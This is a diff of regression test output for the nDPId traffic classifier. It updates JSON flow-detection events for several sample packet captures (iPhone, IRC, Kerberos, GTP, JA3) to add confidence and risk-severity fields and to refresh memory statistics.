+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
+00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","total-events-serialized":314}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 500/486
@@ -320,10 +320,10 @@
 ~~ total active/idle flows...: 51/51
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4927217 bytes
-~~ total memory freed........: 4927217 bytes
-~~ total allocations/frees...: 100436/100436
+~~ total memory allocated....: 4995770 bytes
+~~ total memory freed........: 4995770 bytes
+~~ total allocations/frees...: 102026/102026
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 3596 chars
-~~ json string avg len.......: 1949 chars
+~~ json string max len.......: 3622 chars
+~~ json string avg len.......: 1962 chars
diff --git a/test/results/ipv6_in_gtp.pcap.out b/test/results/ipv6_in_gtp.pcap.out
index 3555f339d..3c368bac4 100644
--- a/test/results/ipv6_in_gtp.pcap.out
+++ b/test/results/ipv6_in_gtp.pcap.out
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 515 chars
diff --git a/test/results/irc.pcap.out b/test/results/irc.pcap.out
index e1d40a801..a9e0612ee 100644
--- a/test/results/irc.pcap.out
+++ b/test/results/irc.pcap.out
@@ -3,8 +3,8 @@
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"}
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
+00910{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}}
 00151{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 29/29
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597718 bytes
-~~ total memory freed........: 4597718 bytes
-~~ total allocations/frees...: 99583/99583
+~~ total memory allocated....: 4682671 bytes
+~~ total memory freed........: 4682671 bytes
+~~ total allocations/frees...: 101173/101173
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 156 chars
-~~ json string max len.......: 725 chars
-~~ json string avg len.......: 496 chars
+~~ json string max len.......: 915 chars
+~~ json string avg len.......: 579 chars
diff --git a/test/results/ja3_lots_of_cipher_suites.pcap.out b/test/results/ja3_lots_of_cipher_suites.pcap.out
index 7a3140364..310583666 100644
--- a/test/results/ja3_lots_of_cipher_suites.pcap.out
+++ b/test/results/ja3_lots_of_cipher_suites.pcap.out
@@ -30,9 +30,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 179 chars
 ~~ json string max len.......: 2347 chars
diff --git a/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out b/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out
index 2b1ca0077..0ab4686f9 100644
--- a/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out
+++ b/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out
@@ -3,7 +3,7 @@
 00238{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":114,"expected":118}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":180000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505724520744,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"ts_msec":1505724520744,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"}
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":180000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":180000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505724520947,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1505724520947,"pkt":"MNF+EIYg\/Ejv6KgaCABFAABgHZ4AAD0Rln6XebkshL70DAhoCGgATAAAMP8APEGxP1xFAAA8AABAADIGm0iXecGgwKiTsQG75IBV2gFiQsba5qAScSDmyQAAAgQFeAQCCAoxbvx\/AAu5rwEDAwc="}
 00448{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"ts_msec":1505724521281,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcNCoAAEARfD6EvvQMl3m5LAhoCGgASAAAMv8AOAE8W3RxUAAARQAANGNLQABABioFwKiTsZd5waDkgAG7Qsba5lXaAWOAEAHJhFMAAAEBCAoAC7oNMW78fw=="}
 00238{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110}
@@ -30,7 +30,7 @@
 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":24,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":1202,"expected":1206}
 00449{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"ts_msec":1505724526501,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABc0zYAAEAR3TGEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3SFUAAARQAANGNWQABABin6wKiTsZd5waDkgAG7QsbjA1XaCIaAEQIjYE4AAAEBCAoAC7vkMW8PEg=="}
 00239{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110}
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
 00181{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","total-events-serialized":34}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 27/27
@@ -40,9 +40,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595612 bytes
-~~ total memory freed........: 4595612 bytes
-~~ total allocations/frees...: 99580/99580
+~~ total memory allocated....: 4680565 bytes
+~~ total memory freed........: 4680565 bytes
+~~ total allocations/frees...: 101170/101170
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 186 chars
 ~~ json string max len.......: 1935 chars
diff --git a/test/results/kerberos.pcap.out b/test/results/kerberos.pcap.out
index 78d4acf4a..95b5767e5 100644
--- a/test/results/kerberos.pcap.out
+++ b/test/results/kerberos.pcap.out
@@ -1,20 +1,21 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00714{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
